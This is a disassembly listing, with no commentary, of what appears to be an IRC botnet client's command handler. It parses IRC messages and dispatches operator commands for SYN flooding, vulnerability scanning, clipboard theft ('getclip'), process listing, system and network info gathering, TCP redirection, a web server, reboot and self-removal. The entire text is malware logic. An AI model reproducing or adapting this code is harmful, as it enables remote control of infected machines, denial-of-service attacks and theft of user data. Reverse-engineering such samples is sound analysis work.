mov esi, [ebp+var_9C]
push esi
push offset a001 ; "001"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40D1AF
push esi
push offset a005 ; "005"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40D1AF
push esi
push offset a302 ; "302"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408A17
push offset a@ ; "@"
push [ebp+var_94]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz short loc_408A50
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_416A10
add esp, 0Ch
jmp short loc_408A50
; ---------------------------------------------------------------------------
loc_408A17: ; CODE XREF: sub_4087B3+238�j
push esi
push offset a433 ; "433"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408A57
push ebx
push dword_483620
push dword_42C92C
push [ebp+arg_10]
call sub_401343
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_401032
add esp, 1Ch
loc_408A50: ; CODE XREF: sub_4087B3+1D8�j
; sub_4087B3+1F4�j ...
mov eax, edi
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_408A57: ; CODE XREF: sub_4087B3+273�j
mov esi, [ebp+arg_18]
mov [ebp+var_A4], 5
mov edi, 80h
loc_408A69: ; CODE XREF: sub_4087B3+2DB�j
lea eax, [ebp+var_A94]
push eax
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408A86
mov [ebp+var_AC], 1
loc_408A86: ; CODE XREF: sub_4087B3+2C7�j
add esi, edi
dec [ebp+var_A4]
jnz short loc_408A69
mov esi, [ebp+var_9C]
push esi
push offset aKick ; "KICK"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_408B7F
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 5
loc_408AB5: ; CODE XREF: sub_4087B3+38F�j
cmp [esi], bl
jz loc_408B3D
push 7Fh
lea eax, [ebp+var_A94]
push esi
push eax
call sub_416A10
lea eax, [ebp+var_C4]
add esp, 0Ch
test eax, eax
jz short loc_408B3D
cmp [ebp+var_94], ebx
jz short loc_408B3D
push [ebp+var_94]
lea eax, [ebp+var_C4]
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408B3D
lea eax, [ebp+var_C4]
mov [esi], bl
push eax
lea eax, [ebp+var_2E4]
push offset unk_42F93C
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_401032
lea eax, [ebp+var_2E4]
push eax
call sub_401014
add esp, 20h
loc_408B3D: ; CODE XREF: sub_4087B3+304�j
; sub_4087B3+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_408AB5
push [ebp+var_94]
push [ebp+arg_10]
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408B77
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_408B6C: ; CODE XREF: sub_4087B3+615�j
; sub_4087B3+858�j ...
push [ebp+arg_4]
call sub_401032
loc_408B74: ; CODE XREF: sub_4087B3+4073�j
; sub_4087B3+4090�j ...
add esp, 10h
loc_408B77: ; CODE XREF: sub_4087B3+5B�j
; sub_4087B3+F1�j ...
push 1
loc_408B79: ; CODE XREF: sub_4087B3+45AA�j
pop eax
loc_408B7A: ; CODE XREF: sub_4087B3+29F�j
; sub_4087B3+2BB0�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408B7F: ; CODE XREF: sub_4087B3+2F2�j
push esi
push offset aNick ; "NICK"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_408CD5
mov eax, [ebp+var_98]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 5
mov [ebp+arg_24], eax
loc_408BA8: ; CODE XREF: sub_4087B3+447�j
lea eax, [ebp+var_A94]
push eax
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408BF5
lea eax, [ebp+var_A94]
push 21h
push eax
call sub_417B60
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_408BF5
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_4175D0
push [ebp+arg_1C]
push edi
call sub_4175E0
add esp, 10h
mov edi, 80h
loc_408BF5: ; CODE XREF: sub_4087B3+406�j
; sub_4087B3+41D�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_408BA8
lea eax, [ebp+var_C4]
test eax, eax
jz loc_408B77
cmp [ebp+arg_24], ebx
jz loc_408B77
push [ebp+arg_10]
lea eax, [ebp+var_C4]
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408C3D
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_416A10
add esp, 0Ch
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_408C3D: ; CODE XREF: sub_4087B3+473�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_408C42: ; CODE XREF: sub_4087B3+4B0�j
cmp [edi], bl
jz short loc_408C59
lea eax, [ebp+var_A94]
push eax
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_408C6A
loc_408C59: ; CODE XREF: sub_4087B3+491�j
inc esi
add edi, 80h
cmp esi, 5
jl short loc_408C42
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_408C6A: ; CODE XREF: sub_4087B3+4A4�j
lea eax, [ebp+var_A94]
push 21h
push eax
call sub_417B60
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_408B77
push eax
call sub_4158E0
push [ebp+arg_24]
mov edi, eax
call sub_4158E0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_408B77
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_3 ; ":%s%s"
push esi
call sub_416821
push ebx
lea eax, [ebp+var_4AC]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4010D2
add esp, 24h
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_408CD5: ; CODE XREF: sub_4087B3+3DB�j
push esi
push offset aPart ; "PART"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_408CF7
push esi
push offset aQuit ; "QUIT"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408D1E
loc_408CF7: ; CODE XREF: sub_4087B3+531�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_408CFC: ; CODE XREF: sub_4087B3+569�j
cmp [edi], bl
jz short loc_408D12
push [ebp+var_A0]
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_408D6C
loc_408D12: ; CODE XREF: sub_4087B3+54B�j
inc esi
add edi, 80h
cmp esi, 5
jl short loc_408CFC
loc_408D1E: ; CODE XREF: sub_4087B3+542�j
push [ebp+var_9C]
push offset dword_42F90C
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_408DCD
push [ebp+var_90]
push [ebp+arg_8]
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408D55
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_408D55: ; CODE XREF: sub_4087B3+597�j
push [ebp+var_90]
push offset unk_42F8D8
loc_408D60: ; CODE XREF: sub_4087B3+43D3�j
; sub_4087B3+49F7�j
call sub_4012B2
pop ecx
loc_408D66: ; CODE XREF: sub_4087B3+4733�j
pop ecx
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_408D6C: ; CODE XREF: sub_4087B3+55D�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2E4]
push offset unk_42F8A4
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push eax
call sub_401014
push [ebp+var_9C]
push offset aPart ; "PART"
call sub_416B70
add esp, 18h
test eax, eax
jnz loc_408B77
lea eax, [ebp+var_2E4]
push eax
mov eax, [ebp+var_A0]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_408B6C
; ---------------------------------------------------------------------------
loc_408DCD: ; CODE XREF: sub_4087B3+57F�j
push [ebp+var_9C]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_416B70
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_408E21
push [ebp+var_9C]
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_408E21
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40D023
cmp dword_42C930, ebx
jz loc_40D023
loc_408E21: ; CODE XREF: sub_4087B3+634�j
; sub_4087B3+646�j
push [ebp+var_9C]
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_408F27
push [ebp+var_9C]
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_408F27
mov eax, [ebp+var_94]
inc [ebp+var_90]
push 4
mov [ebp+var_98], eax
pop esi
mov [ebp+var_A8], esi
loc_408E68: ; CODE XREF: sub_4087B3+830�j
; sub_4087B3+86C�j ...
shl esi, 2
mov ecx, [ebp+esi+var_A0]
lea eax, [ebp+esi+var_A0]
lea edi, [ecx+1]
mov [eax], edi
mov al, [ecx]
cmp al, byte_42C952
mov [ebp+arg_C], edi
jnz loc_408B77
push edi
push offset aLogin ; "login"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40D02B
push edi
push offset aLogin ; "login"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40D02B
cmp [ebp+var_AC], ebx
jnz short loc_408EDB
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_40D023
loc_408EDB: ; CODE XREF: sub_4087B3+70C�j
cmp [ebp+arg_28], ebx
jnz loc_40D023
cmp dword_42CCB0, ebx
mov [ebp+arg_8], ebx
jle loc_4091A5
mov [ebp+arg_20], offset dword_43DBA0
loc_408EFA: ; CODE XREF: sub_4087B3+76D�j
push edi
push [ebp+arg_20]
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40904F
inc [ebp+arg_8]
add [ebp+arg_20], 0B8h
mov eax, [ebp+arg_8]
cmp eax, dword_42CCB0
jl short loc_408EFA
jmp loc_4091A5
; ---------------------------------------------------------------------------
loc_408F27: ; CODE XREF: sub_4087B3+67E�j
; sub_4087B3+694�j
push [ebp+var_9C]
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_408F40
mov [ebp+var_4], 1
loc_408F40: ; CODE XREF: sub_4087B3+784�j
cmp [ebp+var_98], ebx
jz loc_408B77
push offset dword_42A16C
push [ebp+var_98]
call sub_417760
pop ecx
test eax, eax
pop ecx
jz short loc_408F67
cmp [ebp+var_4], ebx
jz short loc_408F73
loc_408F67: ; CODE XREF: sub_4087B3+7AD�j
lea eax, [ebp+var_C4]
mov [ebp+var_98], eax
loc_408F73: ; CODE XREF: sub_4087B3+7B2�j
cmp [ebp+var_94], ebx
jz loc_408B77
inc [ebp+var_94]
jz short loc_408FBF
cmp [ebp+arg_10], ebx
jz short loc_408FBF
lea eax, [ebp+var_564]
push eax
call sub_4158E0
push eax
lea eax, [ebp+var_564]
push [ebp+var_94]
push eax
call sub_417B10
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_A8], esi
jmp short loc_408FC5
; ---------------------------------------------------------------------------
loc_408FBF: ; CODE XREF: sub_4087B3+7D2�j
; sub_4087B3+7D7�j
mov esi, [ebp+var_A8]
loc_408FC5: ; CODE XREF: sub_4087B3+80A�j
mov edi, [ebp+esi*4+var_A0]
cmp edi, ebx
jz loc_408B77
push edi
push offset dword_42F878
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_408E68
mov ecx, [ebp+var_98]
cmp byte ptr [ecx], 23h
jz short loc_409010
mov eax, dword_483634
mov eax, off_42C9E8[eax*4]
cmp [eax], bl
jz short loc_409010
push eax
push ecx
push offset dword_42F858
jmp loc_408B6C
; ---------------------------------------------------------------------------
loc_409010: ; CODE XREF: sub_4087B3+83F�j
; sub_4087B3+84F�j
push edi
push offset dword_42F850
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_408E68
mov eax, [ebp+esi*4+var_9C]
cmp eax, ebx
jz loc_408E68
mov ecx, [ebp+var_98]
cmp byte ptr [ecx], 23h
jz loc_408E68
push eax
push ecx
push offset dword_42F834
jmp loc_408B6C
; ---------------------------------------------------------------------------
loc_40904F: ; CODE XREF: sub_4087B3+754�j
push offset asc_42F9C0 ; " :"
push [ebp+arg_0]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz loc_408B77
mov edi, [ebp+arg_8]
mov cl, byte_42C952
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_42C952
mov [eax+3], cl
lea ecx, dword_43DBB8[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_416A10
lea eax, [ebp+esi+var_60]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
loc_4090A7: ; CODE XREF: sub_4087B3+98D�j
push [ebp+arg_8]
lea eax, [ebp+var_20]
push offset aD ; "$%d-"
push eax
call sub_416821
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_417760
add esp, 14h
test eax, eax
jz short loc_40910A
mov eax, [ebp+arg_20]
cmp [eax], ebx
jz short loc_40910A
lea eax, dword_43DBA0[edi]
push eax
call sub_4158E0
add [ebp+var_C], eax
pop ecx
jz short loc_409136
mov eax, [ebp+arg_20]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409136
push eax
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40113B
add esp, 0Ch
jmp short loc_409136
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_4087B3+916�j
; sub_4087B3+91D�j
mov eax, [ebp+arg_20]
cmp [eax], ebx
jnz short loc_409136
lea eax, [ebp+var_20]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_416A10
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40113B
add esp, 18h
loc_409136: ; CODE XREF: sub_4087B3+92F�j
; sub_4087B3+943�j ...
dec [ebp+arg_8]
sub [ebp+arg_20], 4
cmp [ebp+arg_8], ebx
jg loc_4090A7
lea eax, [ebp+esi+var_60]
mov [ebp+arg_8], 10h
mov edi, eax
loc_409153: ; CODE XREF: sub_4087B3+9E3�j
push [ebp+arg_8]
lea eax, [ebp+var_20]
push offset aD_1 ; "$%d"
push eax
call sub_416821
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_417760
add esp, 14h
test eax, eax
jz short loc_40918D
mov eax, [edi]
cmp eax, ebx
jz short loc_40918D
push eax
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40113B
add esp, 0Ch
loc_40918D: ; CODE XREF: sub_4087B3+9C2�j
; sub_4087B3+9C8�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_409153
mov edi, [ebp+arg_C]
mov [ebp+var_C8], 1
loc_4091A5: ; CODE XREF: sub_4087B3+73A�j
; sub_4087B3+76F�j
mov al, [edi]
cmp al, byte_42C952
jz short loc_4091BB
cmp [ebp+var_C8], ebx
jz loc_40937C
loc_4091BB: ; CODE XREF: sub_4087B3+9FA�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40113B
lea eax, [ebp+var_C4]
push eax
push offset aUser_0 ; "$user"
push edi
call sub_40113B
push [ebp+var_98]
push offset aChan ; "$chan"
push edi
call sub_40113B
push ebx
push ebx
lea eax, [ebp+var_20]
push 2
push eax
call sub_401343
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_40113B
add esp, 40h
push [ebp+arg_14]
push offset aServer ; "$server"
push edi
call sub_40113B
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_417760
add esp, 14h
loc_40922A: ; CODE XREF: sub_4087B3+B42�j
test eax, eax
jz loc_4092FA
push edi
push [ebp+arg_0]
call sub_417760
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_416A10
lea eax, [ebp+var_20]
push offset asc_42F7F0 ; ")"
push eax
call sub_4176C0
add esp, 1Ch
cmp [ebp+var_20], 30h
jl short loc_40926A
cmp [ebp+var_20], 39h
jle short loc_40927D
loc_40926A: ; CODE XREF: sub_4087B3+AAF�j
push 3
lea eax, [ebp+var_20]
push offset a63 ; "63"
push eax
call sub_416A10
add esp, 0Ch
loc_40927D: ; CODE XREF: sub_4087B3+AB5�j
lea eax, [ebp+var_20]
push eax
call sub_416CCF
test eax, eax
pop ecx
jle short loc_40929A
lea eax, [ebp+var_20]
push eax
call sub_416CCF
pop ecx
mov [ebp+var_14], al
jmp short loc_4092AB
; ---------------------------------------------------------------------------
loc_40929A: ; CODE XREF: sub_4087B3+AD6�j
call sub_416B18
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_4092AB: ; CODE XREF: sub_4087B3+AE5�j
lea eax, [ebp+var_20]
mov [ebp+var_13], bl
push eax
call sub_4158E0
mov [ebp+arg_8], eax
push 0Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_415CA0
mov eax, [ebp+arg_8]
add eax, 6
push eax
lea eax, [ebp+var_20]
push [ebp+arg_10]
push eax
call sub_416A10
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40113B
push edi
push [ebp+arg_0]
call sub_417760
add esp, 30h
jmp loc_40922A
; ---------------------------------------------------------------------------
loc_4092FA: ; CODE XREF: sub_4087B3+A79�j
mov edi, 1FFh
lea eax, [ebp+var_F9C]
push edi
push [ebp+arg_0]
push eax
call sub_416A10
lea eax, [ebp+var_F9C]
push edi
push eax
lea eax, [ebp+var_119C]
push eax
call sub_416A10
lea eax, [ebp+var_119C]
push offset asc_42BFC4 ; " "
push eax
call sub_4176C0
add esp, 20h
mov [ebp+var_A0], eax
lea edi, [ebp+var_9C]
mov [ebp+arg_10], 1Fh
loc_40934A: ; CODE XREF: sub_4087B3+BAC�j
push offset asc_42BFC4 ; " "
push ebx
call sub_4176C0
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40934A
mov ecx, [ebp+esi+var_A0]
lea eax, [ebp+esi+var_A0]
cmp ecx, ebx
jz loc_408B77
add ecx, 3
mov [eax], ecx
loc_40937C: ; CODE XREF: sub_4087B3+A02�j
mov edi, [ebp+esi+var_A0]
push edi
push offset aRndnick_0 ; "rndnick"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CFD6
push edi
push offset aRn ; "rn"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CFD6
push edi
push offset aDien0w ; "dien0w"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CFB4
push edi
push offset aDn0 ; "dn0"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CFB4
push edi
push offset aLogout ; "logout"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CF09
push edi
push offset aG0t ; "g0t"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CF09
push edi
push offset aVersion ; "version"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CEEB
push edi
push offset aVer ; "ver"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CEEB
push edi
push offset aSecure ; "secure"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDD6
push edi
push offset aSec ; "sec"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDD6
push edi
push offset aUnsecure ; "unsecure"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDD6
push edi
push offset aUnsec ; "unsec"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDD6
push edi
push offset aHttpdstop ; "httpdstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_4094BF
push [ebp+esi+var_9C]
push 3
push offset aServer_0 ; "Server"
push offset dword_42F770
loc_4094A3: ; CODE XREF: sub_4087B3+D30�j
; sub_4087B3+D56�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010A0
add esp, 20h
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_4094BF: ; CODE XREF: sub_4087B3+CDB�j
push edi
push offset aLogstop ; "logstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_4094E5
push [ebp+esi+var_9C]
push 1Ch
push offset aLogList ; "Log list"
push offset dword_42F740
jmp short loc_4094A3
; ---------------------------------------------------------------------------
loc_4094E5: ; CODE XREF: sub_4087B3+D1B�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40950B
push [ebp+esi+var_9C]
push 10h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_42F700
jmp short loc_4094A3
; ---------------------------------------------------------------------------
loc_40950B: ; CODE XREF: sub_4087B3+D41�j
push edi
push offset aSynstop ; "synstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409534
push [ebp+esi+var_9C]
push 0Bh
push offset aSynFlood ; "Syn flood"
push offset dword_42F6D0
jmp loc_4094A3
; ---------------------------------------------------------------------------
loc_409534: ; CODE XREF: sub_4087B3+D67�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40955D
push [ebp+esi+var_9C]
push 4
push offset aServer_0 ; "Server"
push offset dword_42F6A8
jmp loc_4094A3
; ---------------------------------------------------------------------------
loc_40955D: ; CODE XREF: sub_4087B3+D90�j
push edi
push offset aProcsstop ; "procsstop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDBE
push edi
push offset aProcsoff ; "procsoff"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDBE
push edi
push offset aSecurestop ; "securestop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_4095B0
push [ebp+esi+var_9C]
push 19h
push offset aSecure_0 ; "Secure"
push offset dword_42F65C
jmp loc_4094A3
; ---------------------------------------------------------------------------
loc_4095B0: ; CODE XREF: sub_4087B3+DE3�j
push edi
push offset aScan_stop ; "scan.stop"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_4095D9
push [ebp+esi+var_9C]
push 8
push offset aVuln ; "Vuln"
push offset dword_42F62C
jmp loc_4094A3
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4087B3+E0C�j
push edi
push offset aScanstats ; "scanstats"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDA5
push edi
push offset aScan_sts ; "scan.sts"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CDA5
push edi
push offset aReconnect ; "reconnect"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD84
push edi
push offset aR ; "r"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD84
push edi
push offset aDisconnect ; "disconnect"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD62
push edi
push offset aD_0 ; "d"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD62
push edi
push offset aQuit_0 ; "quit"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD1A
push edi
push offset aQ ; "q"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CD1A
push edi
push offset aStatus ; "status"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CCDC
push edi
push offset aS_6 ; "s"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CCDC
push edi
push offset aId ; "id"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CCA5
push edi
push offset aI_0 ; "i"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CCA5
push edi
push offset aReboot ; "reboot"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_409727
call sub_401136
test eax, eax
mov eax, offset unk_42F598
jnz short loc_4096F9
mov eax, offset unk_42F560
loc_4096F9: ; CODE XREF: sub_4087B3+F3F�j
push eax
lea eax, [ebp+var_2E4]
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 1Ch
jmp loc_40B351
; ---------------------------------------------------------------------------
loc_409727: ; CODE XREF: sub_4087B3+F31�j
push edi
push offset aThreads ; "threads"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CBAE
push edi
push offset aT ; "t"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CBAE
push edi
push offset aAliases ; "aliases"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CB8B
push edi
push offset aAl ; "al"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CB8B
push edi
push offset aLog ; "log"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA9B
push edi
push offset aLg ; "lg"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA9B
push edi
push offset aClearlog ; "clearlog"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA82
push edi
push offset aClg ; "clg"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA82
push edi
push offset aNetinfo ; "netinfo"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA48
push edi
push offset aNi ; "ni"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA48
push edi
push offset aSysinfo ; "sysinfo"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA1D
push edi
push offset aSi ; "si"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40CA1D
push edi
push offset aRemove ; "remove"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C9E3
push edi
push offset aRm ; "rm"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C9E3
push edi
push offset aProcs ; "procs"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C8CF
push edi
push offset aPs ; "ps"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C8CF
push edi
push offset aUptime ; "uptime"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C848
push edi
push offset aUp ; "up"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C848
push edi
push offset aDriveinfo ; "driveinfo"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C82B
push edi
push offset aDrv ; "drv"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C82B
push edi
push offset aTestdlls ; "testdlls"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C812
push edi
push offset aDll ; "dll"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C812
push edi
push offset aWho ; "who"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40997C
cmp [ebp+var_8], ebx
jnz short loc_409925
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_409925: ; CODE XREF: sub_4087B3+1156�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40992A: ; CODE XREF: sub_4087B3+11BD�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_409936
mov eax, offset aEmpty ; "<Empty>"
loc_409936: ; CODE XREF: sub_4087B3+117C�j
push eax
push esi
lea eax, [ebp+var_2E4]
push offset aD_S ; "%d. %s"
push eax
call sub_416821
push 1
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 24h
inc esi
add edi, 80h
cmp esi, 5
jl short loc_40992A
push offset unk_42F464
jmp loc_40CC9A
; ---------------------------------------------------------------------------
loc_40997C: ; CODE XREF: sub_4087B3+1151�j
push edi
push offset aGetclip ; "getclip"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C7D1
push edi
push offset aGc ; "gc"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C7D1
push edi
push offset aFlusharp ; "flusharp"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C7A6
push edi
push offset aFarp ; "farp"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C7A6
push edi
push offset aFlushdns ; "flushdns"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C782
push edi
push offset aFdns ; "fdns"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C782
push edi
push offset aScan_currentip ; "scan.currentip"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C748
push edi
push offset aScan_cip ; "scan.cip"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C748
push edi
push offset aHttpd_on ; "httpd.on"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_40C5A6
push edi
push offset aWeb_on ; "web.on"
call sub_416B70
pop ecx
